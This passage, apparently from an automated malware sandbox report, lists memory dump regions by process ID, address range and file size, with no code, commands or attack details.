                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            10.8MB

                                                                                                                                                                                                                                                                                          • memory/3164-3-0x00000220508C0000-0x00000220508CC000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            48KB

                                                                                                                                                                                                                                                                                          • memory/3164-1-0x00007FFB24C90000-0x00007FFB25752000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            10.8MB

                                                                                                                                                                                                                                                                                          • memory/3384-420-0x0000000000400000-0x0000000001DFC000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            26.0MB

                                                                                                                                                                                                                                                                                          • memory/3624-136-0x00000000070F0000-0x000000000710A000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            104KB

                                                                                                                                                                                                                                                                                          • memory/3624-129-0x0000000007620000-0x0000000007C9A000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            6.5MB

                                                                                                                                                                                                                                                                                          • memory/3624-119-0x000000006FE50000-0x000000006FE9C000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                          • memory/3624-137-0x00000000070E0000-0x00000000070E8000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            32KB

                                                                                                                                                                                                                                                                                          • memory/3624-134-0x0000000007090000-0x000000000709E000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            56KB

                                                                                                                                                                                                                                                                                          • memory/3624-120-0x000000006FA70000-0x000000006FDC7000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            3.3MB

                                                                                                                                                                                                                                                                                          • memory/3624-130-0x0000000006FE0000-0x0000000006FFA000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            104KB

                                                                                                                                                                                                                                                                                          • memory/3624-135-0x00000000070A0000-0x00000000070B5000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            84KB

                                                                                                                                                                                                                                                                                          • memory/3968-654-0x0000000010000000-0x00000000105E1000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            5.9MB

                                                                                                                                                                                                                                                                                          • memory/3968-534-0x0000000000170000-0x00000000007E4000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            6.5MB

                                                                                                                                                                                                                                                                                          • memory/4112-597-0x000000006DD80000-0x000000006E0D7000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            3.3MB

                                                                                                                                                                                                                                                                                          • memory/4112-596-0x000000006FCC0000-0x000000006FD0C000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                          • memory/4576-650-0x0000000000400000-0x00000000008AD000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            4.7MB

                                                                                                                                                                                                                                                                                          • memory/4576-533-0x0000000000400000-0x00000000008AD000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            4.7MB

                                                                                                                                                                                                                                                                                          • memory/4676-31-0x0000000001BD0000-0x0000000001CD0000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            1024KB

                                                                                                                                                                                                                                                                                          • memory/4676-370-0x0000000000400000-0x0000000001A3D000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            22.2MB

                                                                                                                                                                                                                                                                                          • memory/5184-774-0x0000000010000000-0x00000000105E1000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            5.9MB

                                                                                                                                                                                                                                                                                          • memory/5184-728-0x0000000000170000-0x00000000007E4000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            6.5MB

                                                                                                                                                                                                                                                                                          • memory/5200-707-0x000002152A510000-0x000002152AA38000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            5.2MB

                                                                                                                                                                                                                                                                                          • memory/5200-696-0x000002150C730000-0x000002150C73A000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            40KB

                                                                                                                                                                                                                                                                                          • memory/5200-705-0x0000021529F90000-0x0000021529F9A000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            40KB

                                                                                                                                                                                                                                                                                          • memory/5200-710-0x000002152A020000-0x000002152A070000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            320KB

                                                                                                                                                                                                                                                                                          • memory/5200-711-0x0000021529FD0000-0x0000021529FDC000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            48KB

                                                                                                                                                                                                                                                                                          • memory/5200-691-0x00000215252B0000-0x0000021525362000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            712KB

                                                                                                                                                                                                                                                                                          • memory/5200-692-0x0000021525360000-0x00000215253DA000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            488KB

                                                                                                                                                                                                                                                                                          • memory/5200-694-0x00000215254C0000-0x0000021525536000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            472KB

                                                                                                                                                                                                                                                                                          • memory/5200-695-0x0000021525010000-0x000002152503A000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            168KB

                                                                                                                                                                                                                                                                                          • memory/5200-700-0x0000021525540000-0x0000021525840000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            3.0MB

                                                                                                                                                                                                                                                                                          • memory/5200-730-0x0000021525B70000-0x0000021525B92000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            136KB

                                                                                                                                                                                                                                                                                          • memory/5200-703-0x00000215298C0000-0x00000215298F8000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            224KB

                                                                                                                                                                                                                                                                                          • memory/5200-693-0x00000215253E0000-0x0000021525442000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            392KB

                                                                                                                                                                                                                                                                                          • memory/5200-689-0x0000021524FE0000-0x0000021524FEA000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            40KB

                                                                                                                                                                                                                                                                                          • memory/5200-656-0x0000021525050000-0x0000021525160000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            1.1MB

                                                                                                                                                                                                                                                                                          • memory/5200-702-0x0000021529F80000-0x0000021529F88000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            32KB

                                                                                                                                                                                                                                                                                          • memory/5200-657-0x000002150C620000-0x000002150C630000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            64KB

                                                                                                                                                                                                                                                                                          • memory/5200-660-0x0000021524FB0000-0x0000021524FD4000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            144KB

                                                                                                                                                                                                                                                                                          • memory/5200-659-0x000002150C750000-0x000002150C764000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                                                                                          • memory/5200-704-0x0000021529890000-0x000002152989E000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            56KB

                                                                                                                                                                                                                                                                                          • memory/5200-658-0x000002150C770000-0x000002150C77C000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            48KB

                                                                                                                                                                                                                                                                                          • memory/5200-652-0x0000021506F60000-0x000002150A858000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            57.0MB

                                                                                                                                                                                                                                                                                          • memory/5200-706-0x0000021529FB0000-0x0000021529FD2000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            136KB

                                                                                                                                                                                                                                                                                          • memory/5324-713-0x000000006FCC0000-0x000000006FD0C000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                          • memory/5324-729-0x0000000005780000-0x0000000005795000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            84KB

                                                                                                                                                                                                                                                                                          • memory/5324-723-0x0000000006F30000-0x0000000006FD4000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            656KB

                                                                                                                                                                                                                                                                                          • memory/5324-714-0x000000006DD80000-0x000000006E0D7000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            3.3MB

                                                                                                                                                                                                                                                                                          • memory/5344-594-0x0000000007C30000-0x00000000081D6000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            5.6MB

                                                                                                                                                                                                                                                                                          • memory/5344-593-0x0000000006990000-0x00000000069B2000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            136KB

                                                                                                                                                                                                                                                                                          • memory/5904-866-0x0000000000400000-0x0000000001DFC000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            26.0MB

                                                                                                                                                                                                                                                                                          • memory/5904-772-0x0000000000400000-0x0000000001DFC000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            26.0MB

                                                                                                                                                                                                                                                                                          • memory/5904-894-0x0000000000400000-0x0000000001DFC000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            26.0MB

                                                                                                                                                                                                                                                                                          • memory/6028-667-0x00000000067D0000-0x00000000067E5000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            84KB

                                                                                                                                                                                                                                                                                          • memory/6028-649-0x0000000007C40000-0x0000000007CE4000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            656KB

                                                                                                                                                                                                                                                                                          • memory/6028-640-0x000000006DD80000-0x000000006E0D7000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            3.3MB

                                                                                                                                                                                                                                                                                          • memory/6028-636-0x0000000006D50000-0x0000000006D9C000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                          • memory/6028-639-0x000000006E2F0000-0x000000006E33C000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                          • memory/6028-651-0x0000000007F90000-0x0000000007FA1000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            68KB